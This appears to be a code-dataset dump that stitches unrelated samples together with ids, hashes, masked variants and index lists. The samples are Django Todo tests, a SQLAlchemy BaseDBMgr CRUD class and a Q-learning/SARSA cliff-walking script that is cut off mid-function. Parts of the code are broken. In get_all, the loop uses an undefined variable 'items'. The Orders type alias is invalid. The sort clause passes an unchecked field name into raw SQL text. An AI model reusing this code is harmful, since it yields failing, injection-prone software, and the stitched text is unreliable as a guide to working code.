user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
def test_mark_done_already_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', is_done=
True, done_by=user, owner=user)
res = todo.mark_done(user)
self.assertIsNone(res)
self.assertEqual(Todo.objects.count(), 0)
| # -*- coding: utf-8 -*-
from django.test import TestCase
from django.contrib.auth.models import User
from ..models import Todo
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user', password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
def test_mark_done_already_done(self):
user = User.objects.create_user(email='user@…', username='user', password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user)
res = todo.mark_done(user)
self.assertIsNone(res)
# todo not saved because mark_done don't save already done todos
self.assertEqual(Todo.objects.count(), 0)
| [
1,
2,
3,
4,
5
] |
38 | 509129052f97bb32b4ba0e71ecd7b1061d5f8da2 | <mask token>
| print(180 / 4)
| print (180 / 4) | null | null | [
0,
1,
2
] |
39 | 2c90c4e0b42a75d6d387b9b2d0118d8e991b5a08 | <mask token>
class BaseDBMgr:
def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), page: int=1, per_page: int=10) ->dict:
"""获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
"""
res = {'page': {'current_page': page, 'per_page': per_page,
'total_page': 0, 'count': 0}, 'items': []}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
data = query.offset((page - 1) * per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
<mask token>
def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(
), field: tuple=()) ->dict:
"""获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
"""
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_: BaseMixin, data: dict) ->int:
"""插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
"""
item = cls_(**data)
db.add(item)
db.flush()
return item.id
<mask token>
def delete(self, cls_: BaseMixin, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at == 0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session
=False)
db.commit()
return affect_rows
<mask token>
| <mask token>
class BaseDBMgr:
def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), page: int=1, per_page: int=10) ->dict:
"""获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
"""
res = {'page': {'current_page': page, 'per_page': per_page,
'total_page': 0, 'count': 0}, 'items': []}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
data = query.offset((page - 1) * per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), limit: int=0) ->list:
"""获取所有满足条件的数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int limit 取数据最大数量
@return list
"""
query = db.query(cls_)
if filters:
query = query.filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
if limit != 0:
query = query.limit(limit)
query = query.all()
if not field:
items = [item.to_dict() for item in items]
else:
items = [item.to_dict(only=field) for item in items]
return items
def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(
), field: tuple=()) ->dict:
"""获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
"""
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_: BaseMixin, data: dict) ->int:
"""插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
"""
item = cls_(**data)
db.add(item)
db.flush()
return item.id
def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
return query.update(data, synchronize_session=False)
def delete(self, cls_: BaseMixin, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at == 0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session
=False)
db.commit()
return affect_rows
<mask token>
| <mask token>
class BaseDBMgr:
def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), page: int=1, per_page: int=10) ->dict:
"""获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
"""
res = {'page': {'current_page': page, 'per_page': per_page,
'total_page': 0, 'count': 0}, 'items': []}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
data = query.offset((page - 1) * per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), limit: int=0) ->list:
"""获取所有满足条件的数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int limit 取数据最大数量
@return list
"""
query = db.query(cls_)
if filters:
query = query.filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
if limit != 0:
query = query.limit(limit)
query = query.all()
if not field:
items = [item.to_dict() for item in items]
else:
items = [item.to_dict(only=field) for item in items]
return items
def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(
), field: tuple=()) ->dict:
"""获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
"""
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_: BaseMixin, data: dict) ->int:
"""插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
"""
item = cls_(**data)
db.add(item)
db.flush()
return item.id
def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
return query.update(data, synchronize_session=False)
def delete(self, cls_: BaseMixin, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at == 0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session
=False)
db.commit()
return affect_rows
def count(self, cls_: BaseMixin, filters: set, field=None) ->int:
"""获取满足条件的总行数
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@param string|None field 统计的字段
@return int
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
if field is None:
return query.count()
else:
return query.count(field)
| import math
import decimal
from typing import Union, List, Set
from sqlalchemy import text
from .model import BaseMixin
from ..core.db import db
Orders = List[Set(str, Union(str, int, decimal.Decimal))]
class BaseDBMgr:
def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), page: int=1, per_page: int=10) ->dict:
"""获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
"""
res = {'page': {'current_page': page, 'per_page': per_page,
'total_page': 0, 'count': 0}, 'items': []}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
data = query.offset((page - 1) * per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),
field: tuple=(), limit: int=0) ->list:
"""获取所有满足条件的数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int limit 取数据最大数量
@return list
"""
query = db.query(cls_)
if filters:
query = query.filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
if limit != 0:
query = query.limit(limit)
query = query.all()
if not field:
items = [item.to_dict() for item in items]
else:
items = [item.to_dict(only=field) for item in items]
return items
def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(
), field: tuple=()) ->dict:
"""获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
"""
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_: BaseMixin, data: dict) ->int:
"""插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
"""
item = cls_(**data)
db.add(item)
db.flush()
return item.id
def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
return query.update(data, synchronize_session=False)
def delete(self, cls_: BaseMixin, filters: set) ->int:
"""更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at == 0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session
=False)
db.commit()
return affect_rows
def count(self, cls_: BaseMixin, filters: set, field=None) ->int:
"""获取满足条件的总行数
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@param string|None field 统计的字段
@return int
"""
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at == 0)
if field is None:
return query.count()
else:
return query.count(field)
| import math
import decimal
from typing import Union, List, Set
from sqlalchemy import text
from .model import BaseMixin
from ..core.db import db
Orders = List[Set(str, Union(str, int, decimal.Decimal))]
class BaseDBMgr:
def get_page(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), page:int=1, per_page:int=10)->dict:
'''获取分页数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int page 页码
@param int per_page 每页数据数量
@return dict
'''
res = {
'page': {
'current_page': page,
'per_page': per_page,
'total_page': 0,
'count': 0,
},
'items': []
}
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at==0)
res['page']['count'] = query.count()
res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
data = query.offset((page-1)*per_page).limit(per_page)
if not field:
res['items'] = [item.to_dict() for item in data]
else:
res['items'] = [item.to_dict(only=field) for item in data]
return res
def get_all(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), limit:int=0)->list:
'''获取所有满足条件的数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@param int limit 取数据最大数量
@return list
'''
query = db.query(cls_)
if filters:
query = query.filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at==0)
for order in orders:
field, sort = order
sort = 'desc' if sort not in ['asc', 'desc'] else sort
query = query.order_by(text(f'{field} {sort}'))
if limit != 0:
query = query.limit(limit)
query = query.all()
if not field:
items = [item.to_dict() for item in items]
else:
items = [item.to_dict(only=field) for item in items]
return items
def get_first(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=())->dict:
'''获取所有满足条件的第一条数据
@param BaseMixin cls 数据库模型实体类
@param set filters 查询条件
@param str order 排序
@param tuple field 返回字段
@return dict
'''
items = self.get_all(cls_, filters, orders, field, limit=1)
return items[0] if items else None
def add(self, cls_:BaseMixin, data:dict)->int:
'''插入一条数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@return int 插入数据的主键
'''
item = cls_(**data)
db.add(item)
db.flush()
return item.id
def update(self, cls_:BaseMixin, data:dict, filters:set)->int:
'''更新数据
@param BaseMixin cls 数据库模型实体类
@param dict data 数据
@param set filters 过滤条件
@return int 影响的行数
'''
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at==0)
return query.update(data, synchronize_session=False)
def delete(self, cls_:BaseMixin, filters:set)->int:
'''更新数据
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@return int 影响的行数
'''
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
items = query.filter(cls_.deleted_at==0).all()
for item in items:
item.delete()
affect_rows = len(items)
else:
affect_rows = query.filter(*filters).delete(synchronize_session=False)
db.commit()
return affect_rows
def count(self, cls_:BaseMixin, filters:set, field=None)->int:
'''获取满足条件的总行数
@param BaseMixin cls 数据库模型实体类
@param set filters 过滤条件
@param string|None field 统计的字段
@return int
'''
query = db.query(cls_).filter(*filters)
if hasattr(cls_, 'deleted_at'):
query = query.filter(cls_.deleted_at==0)
if field is None:
return query.count()
else:
return query.count(field)
| [
5,
7,
8,
10,
11
] |
40 | cb2e800cc2802031847b170a462778e5c0b3c6f9 | <mask token>
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<mask token>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
<mask token>
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
<mask token>
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
<mask token>
| <mask token>
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<mask token>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
<mask token>
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
<mask token>
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
print('invalidt method. must be Q_LEARNING or SARSA or both')
import sys
sys.exit()
<mask token>
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = (
run_code(use_q_learning=True, _epsilon=epsilon))
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',
epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(
use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,
fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for reward in rewards:
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
| <mask token>
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<mask token>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
